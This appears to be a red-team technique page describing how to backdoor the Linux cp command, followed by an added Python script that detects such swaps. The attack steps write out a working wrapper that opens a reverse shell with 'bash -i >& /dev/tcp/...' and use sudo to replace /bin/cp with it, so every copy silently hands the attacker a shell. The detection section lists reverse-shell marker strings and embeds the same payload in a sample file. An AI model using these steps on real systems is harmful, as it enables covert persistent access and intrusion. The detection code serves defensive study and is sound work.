redttps

Backdoor in command (Linux)

Description

This technique involves replacing a legitimate system binary (e.g., cp, ls, or nano) with a modified version that executes a payload before performing its expected function. It is highly effective because users unknowingly trigger the payload during normal operations. However, it requires careful handling to avoid detection and to keep the original functionality intact.

Steps

  1. Create the "evil" binary (a wrapper that runs the payload, then hands the arguments to the renamed original):

     echo -e '#!/bin/bash\nbash -i >& /dev/tcp/192.168.56.1/4444 0>&1\n/bin/cp.original "$@"' > /tmp/cp
     chmod +x /tmp/cp

  2. Replace the original binary:

     sudo mv /bin/cp /bin/cp.original
     sudo mv /tmp/cp /bin/cp

  3. Every time someone uses cp, your shell is activated before the actual action is executed.
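An added detection example, not part of the original write-up: a scan that flags the footprint this technique leaves in a binary directory (a script where an ELF is expected, reverse-shell strings inside it, and a renamed original sitting next to the tool of the same name). The sample tree it builds is constructed for the demo, and the marker strings and file names are my assumptions.

```python
import os
import tempfile

ELF_MAGIC = b"\x7fELF"
# Strings typical of a wrapper that opens a reverse shell before calling the real tool (assumed list)
REVERSE_SHELL_MARKERS = (b"/dev/tcp/", b"bash -i", b"nc -e", b"0>&1")


def scan_bin_dir(bin_dir):
    """Scan a directory of system binaries and return (path, severity, reason) findings."""
    findings = []
    for name in sorted(os.listdir(bin_dir)):
        path = os.path.join(bin_dir, name)
        if os.path.islink(path) or not os.path.isfile(path):
            continue
        # A renamed copy next to a tool of the same name is the footprint of a swap.
        base, ext = os.path.splitext(name)
        if ext in (".original", ".bak", ".old") and os.path.exists(os.path.join(bin_dir, base)):
            findings.append((path, "high", "renamed original kept beside %s" % base))
            continue
        with open(path, "rb") as fh:
            head = fh.read(4096)
        if head.startswith(ELF_MAGIC):
            continue
        if head.startswith(b"#!"):
            hits = [m.decode() for m in REVERSE_SHELL_MARKERS if m in head]
            if hits:
                findings.append((path, "high", "script with " + ", ".join(hits)))
            else:
                # Legitimate scripts do live in /bin (e.g. zgrep); report for review only.
                findings.append((path, "info", "script where an ELF is usual"))
    return findings


def build_sample_tree():
    """Constructed sample: a fake ELF 'ls', a swapped 'cp' with its renamed original, a harmless script."""
    d = tempfile.mkdtemp()
    fake_elf = ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 64
    with open(os.path.join(d, "ls"), "wb") as fh:
        fh.write(fake_elf)
    with open(os.path.join(d, "cp.original"), "wb") as fh:
        fh.write(fake_elf)
    with open(os.path.join(d, "cp"), "wb") as fh:
        fh.write(b'#!/bin/bash\nbash -i >& /dev/tcp/192.168.56.1/4444 0>&1\n/bin/cp.original "$@"\n')
    with open(os.path.join(d, "zgrep"), "wb") as fh:
        fh.write(b'#!/bin/sh\nexec grep "$@"\n')
    for name in os.listdir(d):
        os.chmod(os.path.join(d, name), 0o755)
    return d


if __name__ == "__main__":
    for path, severity, why in scan_bin_dir(build_sample_tree()):
        print(severity.upper(), path, why)
```

On a packaged system, pair this with the package manager's own integrity check (`dpkg --verify` or `rpm -Va`), which compares installed files against recorded hashes and would report the swapped cp directly.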

Reference: Created by Luis Rivera